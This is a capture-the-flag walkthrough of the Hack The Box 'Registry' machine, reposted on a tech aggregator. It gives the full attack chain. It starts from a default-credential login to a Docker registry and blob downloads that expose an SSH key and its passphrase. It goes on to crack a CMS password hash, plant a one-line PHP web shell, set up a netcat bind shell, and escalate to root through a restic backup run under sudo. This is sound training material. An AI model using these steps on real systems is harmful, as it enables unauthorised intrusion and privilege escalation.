Registry: Hack The Box Walkthrough

栏目: IT技术 · 发布时间: 4年前

内容简介:This post documents the complete walkthrough of Registry, a retired vulnerableRegistry is a retired vulnerable VM from Hack The Box.Let’s start with a

This post documents the complete walkthrough of Registry, a retired vulnerable VM created by thek , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Registry is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.159 --rate=1000

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-10-20 10:43:43 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.159                                    
Discovered open port 443/tcp on 10.10.10.159                                   
Discovered open port 22/tcp on 10.10.10.159

Nothing unusual with the open ports. Let’s do one better with nmap scanning the discovered ports to establish their services.

# nmap -n -v -Pn -p22,80,443 -A --reason -oN nmap.txt 10.10.10.159
...
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
|   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp  open  http     syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open  ssl/http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Issuer: commonName=Registry
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-05-06T21:14:35
| Not valid after:  2029-05-03T21:14:35
| MD5:   0d6f 504f 1cb5 de50 2f4e 5f67 9db6 a3a9
|_SHA-1: 7da0 1245 1d62 d69b a87e 8667 083c 39a6 9eb2 b2b5

Did you see docker.registry.htb ? Let’s pop that in to /etc/hosts .

Docker Registry

Something tells me that I’m looking at a docker registry.

# curl -ik https://docker.registry.htb/v2/
HTTP/1.1 401 Unauthorized
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 20 Oct 2019 15:10:45 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 87
Connection: keep-alive
Docker-Distribution-Api-Version: registry/2.0
Www-Authenticate: Basic realm="Registry"
X-Content-Type-Options: nosniff

{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":null}]}

Bingo.

Based on the API overview , I can simply issue /v2/_catalog , to list the repositories that are in this cluster. I got lucky with the credential ( admin:admin ) by the way.

# curl -ik --user "admin:admin" https://docker.registry.htb/v2/_catalog
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 20 Oct 2019 15:15:16 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 32
Connection: keep-alive
Docker-Distribution-Api-Version: registry/2.0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff

{"repositories":["bolt-image"]}

Seem like this registry is hosting a repository for the Bolt CMS docker image. How’s how the site, /bolt looks like.

Registry: Hack The Box Walkthrough

Let’s list out the tags.

# curl -ik --user "admin:admin" https://docker.registry.htb/v2/bolt-image/tags/list
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 20 Oct 2019 15:20:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 40
Connection: keep-alive
Docker-Distribution-Api-Version: registry/2.0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Frame-Options: DENY
X-Content-Type-Options: nosniff

{"name":"bolt-image","tags":["latest"]}

We can also list out the image manifest like so.

# curl -ik --user "admin:admin" https://docker.registry.htb/v2/bolt-image/manifests/latest
...
"fsLayers": [                                                                                                                                                                                        
      {                                                                                                                                                                                                 
         "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"                                                                                                           
      },                                                                                                                                                                                                
      {                                                                                                                                                                                                 
         "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"                                                                                                           
      },
      {                                                                                                                                                                                                 
         "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"                                                                                                           
      },                                                                                                                                                                                                
      {                                                                                                                                                                                                 
         "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"                                                                                                           
      },                                                                                                                                                                                                
      {                                                                                             
         "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
      },            
      {                                                                                                                                                                                                 
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },                   
      {                                                                                             
         "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"                                                                                                           
      },                                                                                            
      {                   
         "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
      },                                                                                                                                                                                                
      {                                                                                                                                                                                                 
         "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
      },
      {                                                                                                                                                                                                 
         "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
      }
   ],

The blobs are like commits to the “latest” image. They are gzip 'd tarballs. We can download these blobs and inspect them further for any sensitive information. Let’s write a shell script to download all of them.

fetch.sh

#!/bin/bash                                

HOST=docker.registry.htb                   
USER=admin                                 
PASS=admin                                 
BLOB=$1                                    

curl -s \                                  
     --output ${BLOB#sha256:*}.tar.gz \    
     --user "${USER}:${PASS}" \            
     http://$HOST/v2/bolt-image/blobs/$BLOB

Combine the script with GNU Parallel and you get yourself a multi-threaded downloader of sorts. Registry: Hack The Box Walkthrough

# parallel -j4 ./fetch.sh {} < blobs.txt

The file blobs.txt contains all the digests like so.

sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee
sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c
sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7
sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791
sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0
sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a
sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797
sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff

I found the SSH key pair of bolt .

Registry: Hack The Box Walkthrough

And the password ( GkOcz221Ftb3ugog ) to unlock the private key.

Registry: Hack The Box Walkthrough

Low-Privilege Shell

Suffice to say, the key pair gave me access to a low-privilege shell as bolt , and the file user.txt is at bolt ’s home directory.

Registry: Hack The Box Walkthrough

Looks like someone got there before I did. Registry: Hack The Box Walkthrough

Registry: Hack The Box Walkthrough

Privilege Escalation

During enumeration of bolt ’s account, I notice that that I can read the SQLite3 database used in Bolt CMS at /var/www/html/bolt/app/database/bolt.db . It’s trivial to download a copy with scp to my attacking machine for further analysis.

# scp -i bolt <a href="/cdn-cgi/l/email-protection" data-cfemail="b7d5d8dbc3f786879986879986879986828e">[email protected]</a>:/var/www/html/bolt/app/database/bolt.db .
# sqlite3 bolt.db

Registry: Hack The Box Walkthrough

Sending the hash to John the Ripper reveals the password ( strawbery ).

Registry: Hack The Box Walkthrough

Armed with admin ’s password, I can log in to the Bolt CMS admin page at /bolt/bolt .

Registry: Hack The Box Walkthrough

Bolt CMS Admin

One can allow PHP scripts to be uploaded in Bolt CMS by editing the config.yml file at line 240 to include ‘php’ as shown below. Once that’s done, you can upload a simple PHP shell as follows.

<?php echo shell_exec($_GET[0]); ?>

Registry: Hack The Box Walkthrough

Registry: Hack The Box Walkthrough

Registry: Hack The Box Walkthrough

There you have it. Usually at this point, it’s time to get a reverse shell but that’s pointless because all outbound traffic is blocked.

Registry: Hack The Box Walkthrough

What now? If a reverse shell is not possible, then we’ll try a bind shell. But first, we need the nc package with the -c and -e switches. To do that, let’s transfer the nc from Kali Linux over to /tmp with scp .

# scp -i bolt /bin/nc.traditional <a href="/cdn-cgi/l/email-protection" data-cfemail="b9dbd6d5cdf9888997888997888997888c80">[email protected]</a>:/tmp/nc

Registry: Hack The Box Walkthrough

Looks like www-data has the permission to do something as root without password!

Registry: Hack The Box Walkthrough

Restic Backup

According to the documentation ,

Restic is a fast and secure backup program.

The sudo policy seems to be suggesting that we backup to a remote REST server. Recall that all outbound traffic is blocked? Well, we’ll just have to set up the REST server locally and have restic installed on our machine remotely restore the data instead.

Registry: Hack The Box Walkthrough

We’ll transfer a copy of rest-server over with scp . Good thing that rest-server is a statically-linked executable with no external dependencies.

# scp -i bolt rest-server <a href="/cdn-cgi/l/email-protection" data-cfemail="55373a39211564657b64657b64657b64606c">[email protected]</a>:/dev/shm

Next, let’s set up a local repository as a remote repository shares the same layout.

Registry: Hack The Box Walkthrough

Here we can choose any password, just don’t forget it. Once that’s done, we can set up the REST server.

./rest-server --listen :8888 --no-auth --path=/dev/shm/rip &

Here’s the local REST server is listening at 8888/tcp and the path is pointing to /dev/shm/rip , the local repository we just initialized.

Time to backup /root as root !

Registry: Hack The Box Walkthrough

On my machine, I can dump root.txt from the latest snapshot.

Registry: Hack The Box Walkthrough

Registry: Hack The Box Walkthrough

Afterthought

Due to a decision by HTB to patch this machine at the Eleventh Hour, I’ve to rework the privilege escalation section. I apologize in advance if the write-up appears incoherent.


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

人工智能

人工智能

Stuart J. Russell、Peter Norvig / 清华大学出版社 / 2011-7 / 158.00元

《人工智能:一种现代的方法(第3版)(影印版)》最权威、最经典的人工智能教材,已被全世界100多个国家的1200多所大学用作教材。《人工智能:一种现代的方法(第3版)(影印版)》的最新版全面而系统地介绍了人工智能的理论和实践,阐述了人工智能领域的核心内容,并深入介绍了各个主要的研究方向。全书仍分为八大部分:第一部分“人工智能”,第二部分“问题求解”,第三部分“知识与推理”,第四部分“规划”,第五部......一起来看看 《人工智能》 这本书的介绍吧!

URL 编码/解码
URL 编码/解码

URL 编码/解码

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换